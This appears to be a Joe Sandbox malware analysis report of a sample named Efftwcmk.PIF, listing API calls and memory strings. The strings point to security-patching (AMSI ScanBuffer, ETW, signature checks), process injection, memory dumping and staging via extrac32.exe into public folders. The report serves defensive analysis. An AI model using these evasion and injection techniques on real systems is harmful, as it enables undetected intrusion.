Opcode ID: 72f214b30b7a31a0438d8df5d67accc07137fdd02f0cc510d0b626a2bd9807b8
Instruction ID: 83617da317bf4f9069cd5ad07b0480d5bde12434d573cfa9d9362b63a95c544a
Opcode Fuzzy Hash: 72f214b30b7a31a0438d8df5d67accc07137fdd02f0cc510d0b626a2bd9807b8
Instruction Fuzzy Hash: 83412A79A00306BFDB118F75EC44BAA7BA8EF05764F148169F894AF690DB34B901C7A0

Analysis Process: Efftwcmk.PIFPID: 1696, Parent PID: 1244COMMON

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0.6%
Total number of Nodes:	511
Total number of Limit Nodes:	28

Executed Functions

Function 02C8D754 Relevance: 234.2, APIs: 15, Strings: 114, Instructions: 8400processCOMMON

Download Yara Rule

APIs

InetIsOffline.URL(00000000,00000000,02C97487,?,?,00000269,00000000,00000000), ref: 02C8D7C4

Part of subcall function 02C87DF4: LoadLibraryW.KERNEL32(?,00000000,02C87EC3), ref: 02C87E24
Part of subcall function 02C87DF4: GetModuleHandleW.KERNEL32(?,?,00000000,02C87EC3), ref: 02C87E2A
Part of subcall function 02C87DF4: GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,02C87EC3), ref: 02C87E43

Part of subcall function 02C77E08: GetFileAttributesA.KERNEL32(00000000,?,02C8E34C,ScanString,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,ScanString,02CAF358,02C974BC,UacScan,02CAF358,02C974BC,UacInitialize), ref: 02C77E13

Part of subcall function 02C7C2DC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,02C8E67E,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,ScanBuffer,02CAF358,02C974BC,OpenSession), ref: 02C7C2F3

Part of subcall function 02C8C7B8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02C8C888), ref: 02C8C7F3
Part of subcall function 02C8C7B8: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02C8C888), ref: 02C8C823
Part of subcall function 02C8C7B8: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02C8C838
Part of subcall function 02C8C7B8: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02C8C864
Part of subcall function 02C8C7B8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02C8C86D

Part of subcall function 02C77E2C: GetFileAttributesA.KERNEL32(00000000,?,02C913E1,ScanString,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,ScanBuffer,02CAF358,02C974BC,ScanString), ref: 02C77E37

Part of subcall function 02C77FC0: CreateDirectoryA.KERNEL32(00000000,00000000,?,02C915D2,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,Initialize,02CAF358,02C974BC,ScanString,02CAF358,02C974BC), ref: 02C77FCD

WinExec.KERNEL32 ref: 02C92899

Part of subcall function 02C8C6D4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02C8C7A6), ref: 02C8C713
Part of subcall function 02C8C6D4: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C8C74D
Part of subcall function 02C8C6D4: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02C8C77A
Part of subcall function 02C8C6D4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02C8C783

Strings

NtReadVirtualMemory, xrefs: 02C96E11
SLGetSLIDList, xrefs: 02C95C0B
RtlAllocateHeap, xrefs: 02C963AD, 02C96413
NtQuerySecurityObject, xrefs: 02C96E44
OpenSession, xrefs: 02C8D85D, 02C8E23F, 02C8E360, 02C8E46D, 02C8E585, 02C8E959, 02C8EAF7, 02C8EC9D, 02C8EDC0, 02C8EF59, 02C8F051, 02C8F23E, 02C8F3E4, 02C8F71D, 02C8F94B, 02C8FABF, 02C8FBE2, 02C8FD60, 02C90106, 02C90189, 02C902A1, 02C903B9, 02C904C5, 02C906E3, 02C90800, 02C90A9F, 02C90B1B, 02C90D30, 02C90ED0, 02C91199, 02C912D3, 02C91471, 02C9165A, 02C919F1, 02C91B8B, 02C91D2B, 02C91ED0, 02C92044, 02C92294, 02C92348, 02C92605, 02C92779, 02C92BA7, 02C92E81, 02C92FF5, 02C93189, 02C93339, 02C93A22, 02C93C27, 02C93E40, 02C93EE3, 02C94076, 02C94346, 02C946DA, 02C949D7, 02C94ACF, 02C94C60, 02C94DF3, 02C94F99, 02C9520E, 02C954FF, 02C95685, 02C958E0, 02C95AE6, 02C95CAA, 02C95F99, 02C96048, 02C96288, 02C9647F, 02C96577, 02C96848, 02C96B21, 02C9705E
NtOpenProcess, xrefs: 02C950FB
MiniDumpWriteDump, xrefs: 02C950BF
GetProxyDllInfo, xrefs: 02C8DA6F
EtwEventWrite, xrefs: 02C96FA9
CreateProcessA, xrefs: 02C96766
NtWriteVirtualMemory, xrefs: 02C96F10
EnumServicesStatusExA, xrefs: 02C96739
CreateProcessW, xrefs: 02C96775
DlpCheckIsCloudSyncApp, xrefs: 02C961E9
SxTracerGetThreadContextDebug, xrefs: 02C95E4B, 02C96C13
advapi32, xrefs: 02C950B0
NtQueryInformationThread, xrefs: 02C96D45
spp, xrefs: 02C95E62, 02C95E95, 02C96C2A
WinHttp.WinHttpRequest.5.1, xrefs: 02C9027B
D2^Tyj}~TVrgoij[Dkcxn}dmu, xrefs: 02C8E8B7
NtQueryDirectoryFile, xrefs: 02C966FD
[InternetShortcut], xrefs: 02C93100
I_QueryTagInformation, xrefs: 02C950AB
mssip32, xrefs: 02C8DCD8, 02C8DD0B, 02C8DD3E, 02C95EFB
MZP, xrefs: 02C956FB
FlushInstructionCache, xrefs: 02C96A39
CreateProcessWithLogonW, xrefs: 02C967A2
NtCreateSection, xrefs: 02C96DAB
VirtualAllocEx, xrefs: 02C9696D
SLGatherMigrationBlob, xrefs: 02C96C79
ScanString, xrefs: 02C8D7F9, 02C8DAC6, 02C8DBCF, 02C8DD60, 02C8DEF1, 02C8E17A, 02C8E2BB, 02C8E841, 02C8F460, 02C8F5FF, 02C8FA43, 02C8FC5E, 02C8FCDA, 02C8FFF7, 02C9031D, 02C905E6, 02C90A23, 02C90E54, 02C91064, 02C9134F, 02C918F9, 02C91975, 02C91B0F, 02C91E54, 02C92218, 02C928AA, 02C93090, 02C93205, 02C932BD, 02C9392A, 02C93DC4, 02C9422B, 02C9484E, 02C95483, 02C95864, 02C95B62, 02C95F1D, 02C96304, 02C964FB, 02C968C4, 02C96B9D
EnumProcessModules, xrefs: 02C96757
\ui, xrefs: 02C910DA
kernel32, xrefs: 02C96951, 02C96984, 02C969B7, 02C969EA, 02C96A1D, 02C96A50, 02C96A83
IconIndex=, xrefs: 02C93163
NtMapViewOfSection, xrefs: 02C96DDE
CreateProcessAsUserW, xrefs: 02C96793, 02C967B1
dbgcore, xrefs: 02C950C4, 02C950D8
http, xrefs: 02C90067
BCryptQueryProviderRegistration, xrefs: 02C8DE09
NtOpenObjectAuditAlarm, xrefs: 02C95097
DlpNotifyPreDragDrop, xrefs: 02C961B6
.url, xrefs: 02C92150
DlpGetWebSiteAccess, xrefs: 02C9624F
NtOpenSection, xrefs: 02C96D78
CryptSIPGetSignedDataMsg, xrefs: 02C8DD27
EnumServicesStatusA, xrefs: 02C9671B
Kernel32, xrefs: 02C9676B, 02C9677A, 02C967B6
HotKey=, xrefs: 02C93297
ieproxy, xrefs: 02C8DA59, 02C8DA80, 02C8DAA7
UacInitialize, xrefs: 02C8D989, 02C8E082, 02C8E7C5, 02C91CAF, 02C9219C, 02C93CA3, 02C952B4, 02C967CC
DllGetClassObject, xrefs: 02C8DA48, 02C8DF67, 02C914E7, 02C95E7E, 02C96C46
psapi, xrefs: 02C9675C
EnumServicesStatusW, xrefs: 02C9672A
CryptSIPVerifyIndirectData, xrefs: 02C8DCF4, 02C95EE4
DllRegisterServer, xrefs: 02C8DA96, 02C8DFCD
ScanBuffer, xrefs: 02C8D8C1, 02C8DC4B, 02C8DE75, 02C8E3DC, 02C8E4E9, 02C8E601, 02C8E9D5, 02C8EB73, 02C8ED19, 02C8EE3C, 02C8EFD5, 02C8F0CD, 02C8F336, 02C8F4DC, 02C8F67B, 02C8F799, 02C8F827, 02C8FB3B, 02C8FDDC, 02C8FEED, 02C9008A, 02C90435, 02C90541, 02C9075F, 02C9087C, 02C90B97, 02C90C38, 02C90DAC, 02C90F6C, 02C9111D, 02C91540, 02C915DE, 02C91801, 02C91A6D, 02C91DA7, 02C920C0, 02C92440, 02C927F5, 02C92A1E, 02C92C23, 02C92D89, 02C92EFD, 02C92F79, 02C93B1A, 02C93BAB, 02C93FDB, 02C9416E, 02C942CA, 02C9443E, 02C948DF, 02C94B4B, 02C94CDC, 02C94E6F, 02C95015, 02C95330, 02C95609, 02C957A2, 02C9595C, 02C95A6A, 02C95DA2, 02C96140, 02C9666F, 02C970DA
NtSetSecurityObject, xrefs: 02C950E7
SetUnhandledExceptionFilter, xrefs: 02C96A6C
sppc, xrefs: 02C95BEF, 02C95C22, 02C95C55, 02C95C88, 02C96C90, 02C96CC3
RetailTracerEnable, xrefs: 02C95E18
WintrustAddActionID, xrefs: 02C8DB63
Ntdll, xrefs: 02C966E4, 02C966F3, 02C96702, 02C96711
DllGetActivationFactory, xrefs: 02C8DF9A
SLGetGenuineInformation, xrefs: 02C95BD8
C:\Windows\System32\, xrefs: 02C8E337, 02C93D21
EtwEventWriteEx, xrefs: 02C96F76
CryptSIPGetInfo, xrefs: 02C8DCC1
DlpGetArchiveFileTraceInfo, xrefs: 02C9621C
VirtualAlloc, xrefs: 02C9693A
RtlQueryProcessDebugInformation, xrefs: 02C9670C
NtGetWriteWatch, xrefs: 02C96CDF
SLLoadApplicationPolicies, xrefs: 02C95C71
VirtualProtect, xrefs: 02C969A0
psapi, xrefs: 02C95EC8
bcrypt, xrefs: 02C8DDED, 02C8DE20, 02C8DE53, 02C96026
NtAlertResumeThread, xrefs: 02C9637A
OpenProcess, xrefs: 02C969D3
SLGetEncryptedPIDEx, xrefs: 02C96CAC
TrustOpenStores, xrefs: 02C8DB30
UacUninitialize, xrefs: 02C91709
UacScan, xrefs: 02C8D9ED, 02C8E006, 02C8E0FE, 02C8E6CD, 02C8F2BA, 02C8F8A3, 02C90205, 02C90918, 02C9187D, 02C91F4C, 02C924BC, 02C926FD, 02C929A2, 02C92AAF, 02C92D0D, 02C92E05, 02C939A6, 02C93D48, 02C93F5F, 02C940F2, 02C943C2, 02C947D2, 02C9495B, 02C94A53, 02C94BE4, 02C94D77, 02C94F1D, 02C95192, 02C953AC, 02C9558D, 02C95726, 02C959D8
DEEX, xrefs: 02C8D7D2
tquery, xrefs: 02C95E2F
smartscreenps, xrefs: 02C8DF7E, 02C8DFB1, 02C8DFE4
BCryptVerifySignature, xrefs: 02C8DDD6, 02C9600F
BCryptRegisterProvider, xrefs: 02C8DE3C
RtlCreateQueryDebugBuffer, xrefs: 02C96446
FindCertsByIssuer, xrefs: 02C8DB96
NtQuerySystemInformation, xrefs: 02C966DF
NtAccessCheck, xrefs: 02C96E77
endpointdlp, xrefs: 02C961CD, 02C96200, 02C96233, 02C96266
C:\\Windows\\System32\\extrac32.exe /C /Y , xrefs: 02C92867
Advapi, xrefs: 02C96720, 02C9672F, 02C9673E, 02C9674D, 02C96789, 02C96798, 02C967A7
C:\Users\Public\, xrefs: 02C92145, 02C933A9
GET, xrefs: 02C90394
NtQueryVirtualMemory, xrefs: 02C96D12
WriteVirtualMemory, xrefs: 02C96A06
MiniDumpReadDumpStream, xrefs: 02C950D3
LdrGetProcedureAddress, xrefs: 02C96EDD
sppwmi, xrefs: 02C96C5D
NtWaitForSingleObject, xrefs: 02C963E0
SLIsGenuineLocalEx, xrefs: 02C95C3E
EnumServicesStatusExW, xrefs: 02C96748
CreateProcessAsUserA, xrefs: 02C96784
ntdll, xrefs: 02C9509C, 02C950EC, 02C95100, 02C96391, 02C963C4, 02C963F7, 02C9642A, 02C9645D, 02C96CF6, 02C96D29, 02C96D5C, 02C96D8F, 02C96DC2, 02C96DF5, 02C96E28, 02C96E5B, 02C96E8E, 02C96EC1, 02C96EF4, 02C96F27, 02C96F5A, 02C96F8D, 02C96FC0
URL=file:", xrefs: 02C9310F
wintrust, xrefs: 02C8DB47, 02C8DB7A, 02C8DBAD
NtDeviceIoControlFile, xrefs: 02C966EE
GetProcessMemoryInfo, xrefs: 02C95EB1
C:\\Users\\Public\\Libraries\\, xrefs: 02C9252C
LdrLoadDll, xrefs: 02C96EAA
Initialize, xrefs: 02C8D925, 02C8E749, 02C8E8DD, 02C8EA7B, 02C8EC21, 02C8EEDD, 02C8F583, 02C8F9C7, 02C8FE71, 02C8FF7B, 02C90662, 02C90994, 02C90CB4, 02C90FE8, 02C913F5, 02C91785, 02C91C33, 02C91FC8, 02C923C4, 02C92589, 02C92681, 02C92926, 02C92B2B, 02C93A9E, 02C94756, 02C95116, 02C95D26, 02C960C4, 02C965F3, 02C96AA5, 02C96FE2
NtOpenFile, xrefs: 02C96F43

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: File$Path$Name$AttributesCloseCreateModuleName_$AddressDirectoryExecHandleInetInformationLibraryLoadOfflineOpenProcQueryReadWrite
String ID: .url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$\ui$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
API String ID: 3167936576-1678658887
Opcode ID: d60e6fa01e839499a03bda83b7b5e284657dad6cbb834444bed203fbc022e8ac
Instruction ID: fda0be1fd00ac3be4d5878bf60a0ea1ff5f5f7c9b2be2f69d4cebc379e0261af
Opcode Fuzzy Hash: d60e6fa01e839499a03bda83b7b5e284657dad6cbb834444bed203fbc022e8ac
Instruction Fuzzy Hash: 9C040D75B901598FDB28EB64CD80ADEB3BAFF85304F1045E6E009A7255DB30AE99DF10

Function 02C944DE Relevance: 167.1, APIs: 9, Strings: 85, Instructions: 2626
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02C87DF4: LoadLibraryW.KERNEL32(?,00000000,02C87EC3), ref: 02C87E24
Part of subcall function 02C87DF4: GetModuleHandleW.KERNEL32(?,?,00000000,02C87EC3), ref: 02C87E2A
Part of subcall function 02C87DF4: GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,02C87EC3), ref: 02C87E43

Part of subcall function 02C72EE0: QueryPerformanceCounter.KERNEL32 ref: 02C72EE4

GetCurrentProcess.KERNEL32(00000000,1DCD6500,00001000,00000040,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,UacScan,02CAF358,02C974BC,ScanBuffer,02CAF358,02C974BC), ref: 02C94D5B

Part of subcall function 02C87924: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02C87931
Part of subcall function 02C87924: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02C87937
Part of subcall function 02C87924: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02C87957

EnumSystemLocalesA.C:\WINDOWS\SYSTEM32\KERNELBASE(2D220000,00000000,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,UacScan,02CAF358,02C974BC,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358), ref: 02C9508D
GetCurrentProcess.KERNEL32(2D220000,00000000,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,UacScan,02CAF358,02C974BC,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358), ref: 02C95092
GetCurrentProcess.KERNEL32(2D220000,00000000,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,UacScan,02CAF358,02C974BC,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358), ref: 02C950A6
GetCurrentProcess.KERNEL32(2D220000,00000000,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,UacScan,02CAF358,02C974BC,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358), ref: 02C950BA

Part of subcall function 02C87CA8: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02CAF384,02C8998C,ScanString,02CAF384,02C89CD0,ScanBuffer,02CAF384,02C89CD0,Initialize,02CAF384,02C89CD0,UacScan), ref: 02C87CBC
Part of subcall function 02C87CA8: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02CAF384,02C8998C,ScanString,02CAF384,02C89CD0,ScanBuffer,02CAF384,02C89CD0,Initialize,02CAF384), ref: 02C87CD6
Part of subcall function 02C87CA8: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,02CAF368,00000001,02CAF374,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02CAF384,02C8998C,ScanString,02CAF384,02C89CD0), ref: 02C87CFC
Part of subcall function 02C87CA8: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02CAF384,02C8998C,ScanString,02CAF384,02C89CD0,ScanBuffer,02CAF384,02C89CD0,Initialize), ref: 02C87D12

GetCurrentProcess.KERNEL32(2D220000,00000000,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,UacScan,02CAF358,02C974BC,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358), ref: 02C950CE
GetCurrentProcess.KERNEL32(2D220000,00000000,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,UacScan,02CAF358,02C974BC,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358), ref: 02C950E2
GetCurrentProcess.KERNEL32(2D220000,00000000,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,UacScan,02CAF358,02C974BC,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358), ref: 02C950F6

Part of subcall function 02C77E08: GetFileAttributesA.KERNEL32(00000000,?,02C8E34C,ScanString,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,ScanString,02CAF358,02C974BC,UacScan,02CAF358,02C974BC,UacInitialize), ref: 02C77E13

Part of subcall function 02C8C6D4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02C8C7A6), ref: 02C8C713
Part of subcall function 02C8C6D4: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C8C74D
Part of subcall function 02C8C6D4: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02C8C77A
Part of subcall function 02C8C6D4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02C8C783

ExitProcess.KERNEL32(00000000,ScanBuffer,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,Initialize,02CAF358,02C974BC,ScanString,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC), ref: 02C9714C

Part of subcall function 02C74C0C: SysFreeString.OLEAUT32(02C8D3D4), ref: 02C74C1A

Strings

SLGetGenuineInformation, xrefs: 02C95BD8
NtReadVirtualMemory, xrefs: 02C96E11
SLGetSLIDList, xrefs: 02C95C0B
RtlAllocateHeap, xrefs: 02C963AD, 02C96413
NtQuerySecurityObject, xrefs: 02C96E44
EtwEventWriteEx, xrefs: 02C96F76
OpenSession, xrefs: 02C944EA, 02C9465E, 02C946DA, 02C949D7, 02C94ACF, 02C94C60, 02C94DF3, 02C94F99, 02C9520E, 02C954FF, 02C95685, 02C958E0, 02C95AE6, 02C95CAA, 02C95F99, 02C96048, 02C96288, 02C9647F, 02C96577, 02C96848, 02C96B21, 02C9705E
NtOpenProcess, xrefs: 02C950FB
MiniDumpWriteDump, xrefs: 02C950BF
DlpGetArchiveFileTraceInfo, xrefs: 02C9621C
VirtualAlloc, xrefs: 02C9693A
RtlQueryProcessDebugInformation, xrefs: 02C9670C
EtwEventWrite, xrefs: 02C96FA9
NtGetWriteWatch, xrefs: 02C96CDF
CreateProcessA, xrefs: 02C96766
NtWriteVirtualMemory, xrefs: 02C96F10
EnumServicesStatusExA, xrefs: 02C96739
CreateProcessW, xrefs: 02C96775
DlpCheckIsCloudSyncApp, xrefs: 02C961E9
SLLoadApplicationPolicies, xrefs: 02C95C71
VirtualProtect, xrefs: 02C969A0
psapi, xrefs: 02C95EC8
bcrypt, xrefs: 02C96026
SxTracerGetThreadContextDebug, xrefs: 02C95E4B, 02C96C13
advapi32, xrefs: 02C950B0
NtQueryInformationThread, xrefs: 02C96D45
spp, xrefs: 02C95E62, 02C95E95, 02C96C2A
NtAlertResumeThread, xrefs: 02C9637A
OpenProcess, xrefs: 02C969D3
NtQueryDirectoryFile, xrefs: 02C966FD
I_QueryTagInformation, xrefs: 02C950AB
mssip32, xrefs: 02C95EFB
SLGetEncryptedPIDEx, xrefs: 02C96CAC
MZP, xrefs: 02C956FB
FlushInstructionCache, xrefs: 02C96A39
CreateProcessWithLogonW, xrefs: 02C967A2
UacScan, xrefs: 02C947D2, 02C9495B, 02C94A53, 02C94BE4, 02C94D77, 02C94F1D, 02C95192, 02C953AC, 02C9558D, 02C95726, 02C959D8
NtCreateSection, xrefs: 02C96DAB
VirtualAllocEx, xrefs: 02C9696D
SLGatherMigrationBlob, xrefs: 02C96C79
ScanString, xrefs: 02C945E2, 02C9484E, 02C95483, 02C95864, 02C95B62, 02C95F1D, 02C96304, 02C964FB, 02C968C4, 02C96B9D
EnumProcessModules, xrefs: 02C96757
tquery, xrefs: 02C95E2F
BCryptVerifySignature, xrefs: 02C9600F
kernel32, xrefs: 02C96951, 02C96984, 02C969B7, 02C969EA, 02C96A1D, 02C96A50, 02C96A83
RtlCreateQueryDebugBuffer, xrefs: 02C96446
NtMapViewOfSection, xrefs: 02C96DDE
CreateProcessAsUserW, xrefs: 02C96793, 02C967B1
dbgcore, xrefs: 02C950C4, 02C950D8
NtQuerySystemInformation, xrefs: 02C966DF
NtOpenObjectAuditAlarm, xrefs: 02C95097
NtAccessCheck, xrefs: 02C96E77
endpointdlp, xrefs: 02C961CD, 02C96200, 02C96233, 02C96266
DlpNotifyPreDragDrop, xrefs: 02C961B6
Advapi, xrefs: 02C96720, 02C9672F, 02C9673E, 02C9674D, 02C96789, 02C96798, 02C967A7
DlpGetWebSiteAccess, xrefs: 02C9624F
NtOpenSection, xrefs: 02C96D78
NtQueryVirtualMemory, xrefs: 02C96D12
WriteVirtualMemory, xrefs: 02C96A06
MiniDumpReadDumpStream, xrefs: 02C950D3
LdrGetProcedureAddress, xrefs: 02C96EDD
EnumServicesStatusA, xrefs: 02C9671B
Kernel32, xrefs: 02C9676B, 02C9677A, 02C967B6
UacInitialize, xrefs: 02C952B4, 02C967CC
psapi, xrefs: 02C9675C
EnumServicesStatusW, xrefs: 02C9672A
DllGetClassObject, xrefs: 02C95E7E, 02C96C46
CryptSIPVerifyIndirectData, xrefs: 02C95EE4
sppwmi, xrefs: 02C96C5D
NtWaitForSingleObject, xrefs: 02C963E0
SLIsGenuineLocalEx, xrefs: 02C95C3E
NtSetSecurityObject, xrefs: 02C950E7
ScanBuffer, xrefs: 02C948DF, 02C94B4B, 02C94CDC, 02C94E6F, 02C95015, 02C95330, 02C95609, 02C957A2, 02C9595C, 02C95A6A, 02C95DA2, 02C96140, 02C9666F, 02C970DA
EnumServicesStatusExW, xrefs: 02C96748
SetUnhandledExceptionFilter, xrefs: 02C96A6C
CreateProcessAsUserA, xrefs: 02C96784
ntdll, xrefs: 02C9509C, 02C950EC, 02C95100, 02C96391, 02C963C4, 02C963F7, 02C9642A, 02C9645D, 02C96CF6, 02C96D29, 02C96D5C, 02C96D8F, 02C96DC2, 02C96DF5, 02C96E28, 02C96E5B, 02C96E8E, 02C96EC1, 02C96EF4, 02C96F27, 02C96F5A, 02C96F8D, 02C96FC0
sppc, xrefs: 02C95BEF, 02C95C22, 02C95C55, 02C95C88, 02C96C90, 02C96CC3
RetailTracerEnable, xrefs: 02C95E18
NtDeviceIoControlFile, xrefs: 02C966EE
GetProcessMemoryInfo, xrefs: 02C95EB1
Ntdll, xrefs: 02C966E4, 02C966F3, 02C96702, 02C96711
LdrLoadDll, xrefs: 02C96EAA
Initialize, xrefs: 02C94566, 02C94756, 02C95116, 02C95D26, 02C960C4, 02C965F3, 02C96AA5, 02C96FE2
NtOpenFile, xrefs: 02C96F43

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: Process$Current$AddressFileLibraryProc$FreeHandleLoadMemoryModulePathVirtualWrite$AllocateAttributesCloseCounterCreateEnumExitLocalesNameName_PerformanceQueryStringSystem
String ID: Advapi$BCryptVerifySignature$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
API String ID: 2822495149-1690217862
Opcode ID: 4c1311eb5434b8680748afc131119d4824039d95005a30db277687d5824be99f
Instruction ID: cd506fde5834dc2053437469dcf33212b13bf06a5236f0249b3a1ca39d57a6bf
